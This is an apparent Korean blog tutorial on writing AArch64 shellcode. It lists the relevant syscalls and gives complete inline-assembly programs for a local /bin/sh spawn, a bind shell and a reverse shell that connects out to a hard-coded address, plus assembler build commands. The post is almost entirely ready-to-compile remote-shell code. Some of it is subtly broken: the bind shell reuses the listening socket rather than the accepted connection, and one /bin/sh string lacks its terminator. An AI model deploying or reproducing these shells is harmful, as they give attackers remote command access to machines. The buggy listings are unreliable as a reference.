AArch64 환경에서 어셈블리로 Shellcode를 작성해본다.

ARM syscalls

NR	syscall name	x8	x0	x1	x2
198	socket	0xc6	int	int	int
200	bind	0xc8	int	struct sockaddr *	int
201	listen	0xc9	int	int
202	accept	0xca	int	struct sockaddr *	int *
203	connect	0xcb	int	struct sockaddr *	int
221	execve	0xdd	const char *filename	const char const argv	const chaar const envp
24	dup3	0x18	unsigned int oldfd	unsigned int newfd	int flags

Shellcode

__asm__(
    ".global run_sh\n"
    "run_sh:\n"

    "mov x8, #221\n"
    "ldr x0, =sh_string\n"
    "mov x1, #0\n"
    "mov x2, #0\n"
    "svc 0\n"

    ".section .rodata\n"
    "sh_string: .ascii \"/bin/sh\\0\""
);

void run_sh();

int main() {
    run_sh();
}

Bind Shellcode

#include <stdio.h>

__asm__(
    ".global run_sh\n"
    "run_sh:\n"

// socket
    "mov x8, #0xc6\n"
    "mov x0, #2\n"
    "mov x1, #1\n"
    "mov x2, #0\n"
    "svc 0\n"
    "mov x19, x0\n"

// bind
    "mov x8, #0xc8\n"
    "mov x0, x19\n"
    "ldr x1, =sockaddr\n"
    "mov x2, #16\n"
    "svc 0\n"

// listen
    "mov x8, #0xc9\n"
    "mov x0, x19\n"
    "mov x1, #1\n"
    "svc 0\n"

// aceept
    "mov x8, #0xca\n"
    "mov x0, x19\n"
    "mov x1, #0\n"
    "mov x2, #0\n"
    "svc 0\n"

// dup3
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #0\n"
    "mov x2, #0\n"
    "svc 0\n"

// dup3
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #1\n"
    "mov x2, #0\n"
    "svc 0\n"

// dup3
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #2\n"
    "mov x2, #0\n"
    "svc 0\n"

// execve
    "mov x8, #0xdd\n"
    "ldr x0, =sh_string\n"
    "mov x1, #0\n"
    "mov x2, #0\n"
    "svc 0\n"

    ".section .rodata\n"
    "sockaddr:\n"
    ".short 2\n"
    ".short 0x8984\n"
    ".word 0\n"
    ".space 8\n"
    "sh_string: .ascii \"/bin/sh\\0\""
);

void run_sh();

int main() {
    run_sh();
}

Reverse Shellcode

#include <stdio.h>

__asm__(
    ".global run_sh\n"
    "run_sh:\n"

// socket
    "mov x8, #0xc6\n"
    "mov x0, #2\n"
    "mov x1, #1\n"
    "mov x2, #0\n"
    "svc 0\n"
    "mov x19, x0\n"

// connect
    "mov x8, #0xcb\n"
    "mov x0, x19\n"
    "ldr x1, =sockaddr\n"
    "mov x2, #16\n"
    "svc 0\n"

// dup3
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #0\n"
    "mov x2, #0\n"
    "svc 0\n"

// dup3
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #1\n"
    "mov x2, #0\n"
    "svc 0\n"

// dup3
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #2\n"
    "mov x2, #0\n"
    "svc 0\n"

// execve
    "mov x8, #0xdd\n"
    "ldr x0, =sh_string\n"
    "mov x1, #0\n"
    "mov x2, #0\n"
    "svc 0\n"

    ".section .rodata\n"
    "sockaddr:\n"
    ".short 2\n"
    ".short 0x8984\n"
    ".word 0x030011ac\n"
    ".space 8\n"
    "sh_string: .ascii \"/bin/sh\\0\""
);

void run_sh();

int main() {
    run_sh();
}

How to compile ARM assembly code without inline assembly code in C

shell.s

.global _start
_start:

mov x8, #221
ldr x0, =sh_string
mov x1, #0
mov x2, #0
svc 0

.section .rodata
sh_string: .ascii "/bin/sh"

as -o shell.o shell.s
ld -o shell shell.o

ARM Shellcode

Kyohyun Lee
kakunge

ARM syscalls

Shellcode

Bind Shellcode

Reverse Shellcode

How to compile ARM assembly code without inline assembly code in C

You may also enjoy

How to use SageMath

How to write Dockerfile

UTCTF 2024 - simple signature

ARM Shellcode

Kyohyun Leekakunge

ARM syscalls

Shellcode

Bind Shellcode

Reverse Shellcode

How to compile ARM assembly code without inline assembly code in C

You may also enjoy

How to use SageMath

How to write Dockerfile

UTCTF 2024 - simple signature

Kyohyun Lee
kakunge